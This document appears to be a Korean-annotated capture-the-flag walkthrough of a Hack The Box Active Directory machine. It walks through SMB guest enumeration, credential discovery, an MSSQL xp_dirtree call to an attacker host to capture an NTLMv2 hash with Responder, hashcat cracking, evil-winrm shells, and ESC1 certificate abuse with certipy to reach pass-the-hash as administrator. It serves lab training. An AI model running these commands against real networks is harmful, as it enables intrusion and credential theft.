Proof of Concept
10.129.8.240
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Escape]
└─$ nxc smb 10.129.8.240 --generate-hosts-file hosts
SMB 10.129.8.240 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Escape]
└─$ cat hosts
10.129.8.240 DC.sequel.htb sequel.htb DC/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Escape]
└─$ cat /etc/hosts
<SNIP>
10.129.8.240 DC.sequel.htb sequel.htb DCInitial Access
guset 사용자로 Public SMB 디렉토리에 읽기 권한 보유
┌──(kali㉿kali)-[~/Escape]
└─$ nxc smb sequel.htb -u 'guest' -p '' --shares
SMB 10.129.8.240 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.8.240 445 DC [+] sequel.htb\guest:
SMB 10.129.8.240 445 DC [*] Enumerated shares
SMB 10.129.8.240 445 DC Share Permissions Remark
SMB 10.129.8.240 445 DC ----- ----------- ------
SMB 10.129.8.240 445 DC ADMIN$ Remote Admin
SMB 10.129.8.240 445 DC C$ Default share
SMB 10.129.8.240 445 DC IPC$ READ Remote IPC
SMB 10.129.8.240 445 DC NETLOGON Logon server share
SMB 10.129.8.240 445 DC Public READ
SMB 10.129.8.240 445 DC SYSVOL Logon server sharePublic 디렉토리에서 ‘SQL Server Procedures.pdf’ 파일 발견
┌──(kali㉿kali)-[~/Escape]
└─$ smbclient //10.129.8.240/Public/ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1440737 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (26.8 KiloBytes/sec) (average 26.8 KiloBytes/sec)
smb: \>PDF 파일에서 데이터베이스 계정 정보 획득
- PublicUser:GuestUserCantWrite1
<SNIP>
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1.
Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".획득한 계정으로 MSSQL 접속 성공
┌──(kali㉿kali)-[~/Escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:GuestUserCantWrite1@sequel.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>Started Responder on attacker machine
┌──(kali㉿kali)-[~/Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
<SNIP>Authenticated to attacker’s SMB share
SQL (PublicUser guest@msdb)> xp_dirtree //10.10.14.248/share
[%] exec master.sys.xp_dirtree '//10.10.14.248/share',1,1
subdirectory depth file
------------ ----- ----SQL Server 서비스 계정 NTLMv2 해시 획득
┌──(kali㉿kali)-[~/Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.8.240
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:15e399abe33f0325:CE1917348A03344ACEFC4D6A311D9C62:010100000000000000841957ED9EDC01E98E00D25A8E7DA90000000002000800470035003200370001001E00570049004E002D004800370057005300470048003500490055003900480004003400570049004E002D00480037005700530047004800350049005500390048002E0047003500320037002E004C004F00430041004C000300140047003500320037002E004C004F00430041004C000500140047003500320037002E004C004F00430041004C000700080000841957ED9EDC01060004000200000008003000300000000000000000000000003000009283B6A0516FD4D125E8B915D2F922C31A215EA63A5BE462954A15792292D73E0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200340038000000000000000000NTLMv2 해시 크랙하여 sql_svc 계정 평문 비밀번호 획득
- REGGIE1234ronnie
┌──(kali㉿kali)-[~/Escape]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --quiet
SQL_SVC::sequel:15e399abe33f0325:ce1917348a03344acefc4d6a311d9c62:010100000000000000841957ed9edc01e98e00d25a8e7da90000000002000800470035003200370001001e00570049004e002d004800370057005300470048003500490055003900480004003400570049004e002d00480037005700530047004800350049005500390048002e0047003500320037002e004c004f00430041004c000300140047003500320037002e004c004f00430041004c000500140047003500320037002e004c004f00430041004c000700080000841957ed9edc01060004000200000008003000300000000000000000000000003000009283b6a0516fd4d125e8b915d2f922c31a215ea63a5be462954a15792292d73e0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200340038000000000000000000:REGGIE1234ronniesql_svc 계정으로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>Auth as Ryan.Cooper
C:\SQLServer\Logs 디렉토리에서 ERRORLOG.BAK 파일 발견
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAKERRORLOG.BAK 파일 내용에서 아이디/비밀번호로 추정되는 정보 발견
- Ryan.Cooper:NuclearMosquito3
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
<SNIP>
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.방금 알아낸 계정 정보로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
c4050be103c94a176e54856110e82d5b
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::b5
IPv6 Address. . . . . . . . . . . : dead:beef::91e2:5185:c939:fd03
Link-local IPv6 Address . . . . . : fe80::91e2:5185:c939:fd03%4
IPv4 Address. . . . . . . . . . . : 10.129.8.240
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%4
10.129.0.1Privilege Escalation
권한 상승을 위한 취약점 스캔
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad find -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip 10.129.8.240 -target-ip 10.129.8.240 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260216030602_Certipy.txt'
[*] Wrote text output to '20260216030602_Certipy.txt'
[*] Saving JSON output to '20260216030602_Certipy.json'
[*] Wrote JSON output to '20260216030602_Certipy.json'ESC1 취약점 발견
┌──(kali㉿kali)-[~/Escape]
└─$ cat 20260216030602_Certipy.txt
<SNIP>
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.Requested the certificate for the target user
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip '10.129.8.240' -target 'DC.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Authenticated using the obtained certificate and obtained administrator’s HTLM hash
┌──(kali㉿kali)-[~/Escape]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.8.240'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4eeAuthenticated to WinRM service using previously obtained administrator’s NTLM hash
┌──(kali㉿kali)-[~/Escape]
└─$ evil-winrm -i sequel.htb -u 'administrator' -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
63de35c6d4e2acdf52dc452432181681
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::b5
IPv6 Address. . . . . . . . . . . : dead:beef::91e2:5185:c939:fd03
Link-local IPv6 Address . . . . . : fe80::91e2:5185:c939:fd03%4
IPv4 Address. . . . . . . . . . . : 10.129.8.240
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%4
10.129.0.1